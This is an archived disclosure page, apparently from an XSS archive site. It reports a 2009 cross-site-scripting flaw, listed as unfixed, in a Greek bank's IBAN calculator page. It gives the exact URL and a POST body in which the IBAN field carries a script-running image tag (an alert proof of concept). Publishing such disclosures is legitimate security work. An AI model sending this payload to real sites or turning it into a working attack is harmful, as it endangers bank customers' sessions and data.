Advertisements:
Security researcher Hexspirit, has submitted on 08/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.millenniumbank.gr, which at the time of submission ranked 247136 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/05/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 08/05/2009 Date published: 10/05/2009 Fixed? Mail us!Status:  UNFIXED
Author: Hexspirit Domain: www.millenniumbank.gr Category: XSS Pagerank: 247136
URL: http://www.millenniumbank.gr/MillenniumVB/Templates_NB_Tools/NB_PopUp_IBANCalculator.aspx?LANGID=30&
MENU=CALC
POST: __VIEWSTATE=K3ZAOeSLmoYrdQPWHlWSKSkvz2AOkVttey%2Byeiwdvkuxr1dcKR1eK1tju%2FqlKkBe5QMq1hmuu54jMl7PkNTf 7XrEI4KtlF7%2BIF11Usoe5WV99mOAPjzAnY5Y%2FbFFTKjpf%2BYgZjo%2BSZChn9fMXA7lYTjfwAYW1bXuhQTlXb44jczWBgYG hsVqIKled4EYcWCRlZVael%2BxwTDK%2BJEzMCpG4DpxKS8nGvSyGaeExNGVCf8mhYAYb0ed9%2BDSOqtEsAPxSHrzfefEQ%2B%2 FnmCASb%2FYYtpQ2W69g%2BxGOWcljEPKnKRlRjXS3lODrH66dEHUvkIOcECkaLEBo0r6s%2FE4ZPlYY11znnexw53z81vvaDb2r mo8xpVHY%2FOEmUEX4iJo3kQBCl6EBJYRefkGwQDw4NNPkvD43286S%2FxSVzjduOkWZw1ym%2FZpgzrW%2F1gylkAKIvJwm%2Bq x6t3MxZmUH8JI5X8vk0Sg9F4DSOZnCLrfHPKVn5iacivutdqpplPr3rzMUW%2F5OmAogf6YbrgNz1O5lSbLRkNcQ5RZqvOJ6CdND yZipjTSL9uV28u4IVGAovfsGKbAKZEo6mVn0B%2FPBRm1Phi1q7PG1G3bGyv6Rb%2FjW4DTzS3wqkVB7l6lAHOax3tdi8Sc1%2FV L%2FEMINxgrAK8MIV2X1vNy0vbqKvYmZdA8XdsEhWQRYAwNmNqGnDV3AjmhBxDwioIy37w5Fahv3h0ez35TTotARxlcgPCXvxvF6 wS4AM5lpjGbONbkvPb%2BwFKZx2EGBNPlWjws4RNv1lQLmMPFgDr9DVsZCAerw5temZV3TPB1IXPDvkzX5GPBMo79POc%2FAct02 uk3o0xXrLh%2BqD2ZUkp9YhQKLG%2FBGybJ0LUPNCxgAhcPI6qFC%2Be3lAvCXeyHyw%2F7Vc2nGrmW%2FzBA418pFWb3526xrTQ LrBR7Zxq%2B%2BfEfIxAPOUsj4OjptuxdQ5cpEO9wWsj%2Fgt9MF9sWnOvaRvtTHHPG8y%2Fl5fgOL5OD5oXgT2d26ALalU6buYl NDkHIdDooMTo7sdhc5v8oio83FSsq9jhNRInWcmEUGCSXJGLE82UaNgKJcV0%2BFLWgRM1naiLE%2FgFhcQz84G4FdyAnZG8mzaf 9iRznL3rNbIoo3Vt13%2BzG%2BKe1FHjHlCmRExin%2Fq89B2IV7Z%2BaD7%2FSmScXvFBew5ULiXoiqf5XriDtGaooPA4bAlo3x qxiXF7nzWHi9aHxTPInqKqbfUG6pYLyhhd25Xq6qLsRybyyGdnSzY91Q8rWB1GcIULV%2FFHkPwIICwrg06isMhQUC1TuuRTwPCl CJNhj8OXukoFr893iN7k4OtADxeOgjqVPO1qlqISeFk2NrhHpp0HkBjpJc%2BAaSPDTJgVHEFEP6QxMjWpPxhrlmMqtCHSKue6LW i1YdJ0oTXwK645WpX2PWLJKBQtwa3MA8%2BO6%2BczN0h21NjsN7aKsMeNoKGRvhXaPKTAE8XZR1UUfBJjJ%2BAOvTraeDv6Hs0j 0cXEXPtLPWAjfJ48MCkMLV3ezGZ9NseofnlktGVWWPA4OVyXLoV2NFp8uIZFBOe4Uz2lul7bctb9jEAbEHwO%2FM0vioOpHCaNmP Y6Vvrp4fRkVR%2BCXWTR4m5cGJzQbYTFYrSnRSkNHfXLs7fOCB9N7nmAjW%2Btvef5p%2F1FDBwJUatSdJwb3QNMvN%2BMCtCRcE gy%2FFc9l9AgHCgIvHhUIdPFFQMGJGSlV8khHF83Cx5rjwBQGQIrn3mpqrkw%2BjL3dAuujY%2FdHX5rML6VnZ76h3qIcXVIJhlv R4%2BaF22eLRJerzk2cFMQNWAqqdqBHQPI3ff6iDUjXXXeZKvhMG3dza2mgMUcHNqqjG6kakplp6TgyFbd3pHEaN9s0MYl0vEz5p vlP7EUit5w1I3GSbyghgUxoQGqXlNQt9%2BKchp4X4JdOtqBtGvDEc1%2FA4deHvqEvPpxGE2yMQS2BAqBsm2yFg8Gs7XrMeLIei hOUA1BzHCY1qrG5JBD8q%2FHBjIhSce9YL2Zedy8wVezc0rjHDvD2GrYsWWAvCwQv1x%2FhREzJ3CkBZ9ek%2F0rHWzcjMBni5R% 2BRC9LyXhNo951%2BwbtV8wonRn%2FmbIL978LfqYQ%2Fe03h6VkdFkArwOSX4jTjyySiov5jrzFB9zl0NDyKGSnHMRPJ%2FQhjb QkxDsiDm%2F8vJzSvfmEsxC23IT%2B%2FpR5Pf8MIVx39eE0M6l%2BDu5IXD6YteEsMkQrlwuRR15XZMf4O7YQZNUsy7NMzGBqGO TQ2vG4poCk1M2%2BkB4lQQnN3aigCYUlfITM45WqvDCZMA%2FLwPJpFPjF390Ne%2Ba2Vy6%2FlpYNhZHlrD19%2FAHbdWSDz9IC cneos684ylM7YflsbdDCy11hMyAB0HFizVri11gcQioHGJVDt1NF1wM1%2BPQky9f%2FzDX5QhB%2F4yXbI6rEv63Mxge5nM%2Bs ZWDZopGXmR6wwTaXeLpoRMqogs5I5ktrW6u0C8DHbMZoO6AN3PZwEhpzrwq2hDWAkm%2FKp1BDoQxzM2pHWfdzs%2FECVOS2Xv1c LhJmb%2BFPT4O56%2F9IDrBQSXmcJq6qrumOU1BrxtK8UF8Wyd7VvdfF%2BYd80nktZSPMgpNhWQojNX0sf0TVeEXurW8i6mpWh8 EfCY6i8VrKaMwMs%2BvYFLk%2FHJamc%2Fy%2BZJtolqLctE52PU7SGC%2Bbz5vmeN3cCERaVnvPQGgPZMjXcQhhCBzQAm6cI7JN nKyor0Uga4mymiiZEnq2LU8oZfeUWh%2FRsAW6tlwa8YI2PRmLzJbTPMkg2C5tXCJpUdlrAOVUmh23fMxiS1wCHtrb%2Fyyj4Qr% 2F2zUXFk6bYPTM5sYU8gzljNv5umy2lqPW%2Fhi2slVvR%2FsEHlmHcEf4RoUKwuTzSMm2nRlwSo3JFaNOHi2y96WSAKNAFWdfDy N4dcPeIrGIJSmZRv9h0UmOVdKmlXSAqsUwfTmxIqbVeEnnyGn96sVOaYqs0o%2Boq80uhrtR8J%2Bayxn8NRLn9B9kTQZTDXw2dL st0P94ycmzI2aZLcziWtIrB27DSeIWdGf44DCFk67EcBO46IcQ09AgY%2Fpzz%2BMRY0pQXnMFU6DZGlBiPTu%2BNvs8MJIKUIiB bjT1uiiDCR%2F%2F4RMCOnYWdlFdfjKSbEhedwhHkmMCERrGy4TcGMJAuC%2BOtvrQ42ocqnWLPKN5%2BWfOduyMbL3WXa%2FUlB 8yuN0mM6FTpyCVWoqHvOiSkwoziK6QZbw%2FBe86jcyvXHalVbOBOc9PYLjZpQaw9RvYbxpFQUQ5HRaQ7UpOnWGEsDoS%2Fat3gU 2TUBi98I7sYj2AsmjJ7Jd%2BGjCvKNk5BXzMyix%2F%2FBBzTJYHn9QPYMI%2FMBPh2VA6eg72jfR2nGQWqtgmcmgrWfDupugHGE SgY%3D&_ctl0%3AtxtAccountNo=&_ctl0%3AtxtIBANCheck=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F% 3E&_ctl0%3AbtnCheckIBAN=%CE%88%CE%BB%CE%B5%CE%B3%CF%87%CE%BF%CF%82
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense 		Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.